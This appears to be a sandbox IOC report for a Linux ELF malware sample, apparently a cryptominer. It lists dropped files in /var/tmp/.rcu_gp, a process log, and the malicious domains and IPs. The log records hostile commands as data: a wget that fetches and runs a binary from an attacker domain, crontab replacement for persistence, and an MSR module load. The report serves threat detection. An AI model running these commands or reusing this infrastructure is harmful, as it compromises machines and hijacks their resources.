IOC Report
.main.elf


Files

File Path | Type | Category | Malicious
.main.elf | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/var/spool/cron/crontabs/tmp.VYCskO | ASCII text | dropped | malicious
/var/tmp/.rcu_gp/.ps5 | ASCII text | dropped | malicious
/var/tmp/.rcu_gp/.report_system | ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers at 8825120 | dropped | malicious
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | ASCII text, with no line terminators | dropped |
/tmp/sh-thd.QhlKa3 | Bourne-Again shell script, ASCII text executable | dropped |
/var/tmp/.rcu_gp/.ps4 | ASCII text | dropped |
/var/tmp/.rcu_gp/diicot | Bourne-Again shell script, ASCII text executable | dropped |

Processes

Path | Cmdline | Malicious
/tmp/.main.elf | /tmp/.main.elf |
/bin/bash | /tmp/.main.elf -c "exec '/tmp/.main.elf' \"$@\"" /tmp/.main.elf |
/tmp/.main.elf | /tmp/.main.elf |
/bin/bash | /tmp/.main.elf -c " " /tmp/.main.elf |
/bin/bash | - |
/usr/bin/mkdir | mkdir /var/tmp/.rcu_gp |
/bin/bash | - |
/usr/bin/wget | wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system |
/bin/bash | - |
/usr/bin/chmod | chmod +x .report_system |
/bin/bash | - |
/usr/bin/cat | cat |
/bin/bash | - |
/usr/bin/chmod | chmod +x /var/tmp/.rcu_gp/diicot |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/rm | rm -rf /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/crontab | crontab /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/rm | rm -rf /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/var/tmp/.rcu_gp/diicot | - |
/var/tmp/.rcu_gp/./.report_system | /var/tmp/.rcu_gp/./.report_system |
/var/tmp/.rcu_gp/./.report_system | - |
/var/tmp/.rcu_gp/./.report_system | - |
/bin/sh | sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1" |
/bin/sh | - |
/sbin/modprobe | /sbin/modprobe msr allow_writes=on |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
119 further processes are not included in this export.

URLs

Name | IP | Malicious
https://xmrig.com/benchmark/%s | unknown |
https://bugs.launchpad.net/ubuntu/ | unknown |
https://xmrig.com/wizard | unknown |
http://xkobeimparatu.net/.puscarie/.report_system | 66.63.187.195 |
https://gcc.gnu.org/bugsterminate | unknown |
https://xmrig.com/wizard%s | unknown |
https://xmrig.com/docs/algorithms | unknown |

Domains

Name | IP | Malicious
xkobeproxy.xkobeimparatu.net | 91.184.240.129 | malicious
xkobeimparatu.net | 66.63.187.195 |

IPs

IP | Domain | Country | Malicious
91.184.240.129 | xkobeproxy.xkobeimparatu.net | Russian Federation | malicious
66.63.187.195 | xkobeimparatu.net | United States |
109.202.202.202 | unknown | Switzerland |
91.189.91.43 | unknown | United Kingdom |
91.189.91.42 | unknown | United Kingdom |

Memdumps

Base Address | Regiontype | Protect | Malicious
c29000 | | page execute read | malicious
7f9394f79000 | | page read and write |
f07000 | | page read and write |
7f93952f0000 | | page read and write |
e6b000 | | page read and write |
7f9394f77000 | | page execute read |
115c000 | | page read and write |
7ffe81e0f000 | | page read and write |
7f939516b000 | | page read and write |
7f9395335000 | | page read and write |
7ffe81f11000 | | page execute read |
1 further memdump is not included in this export.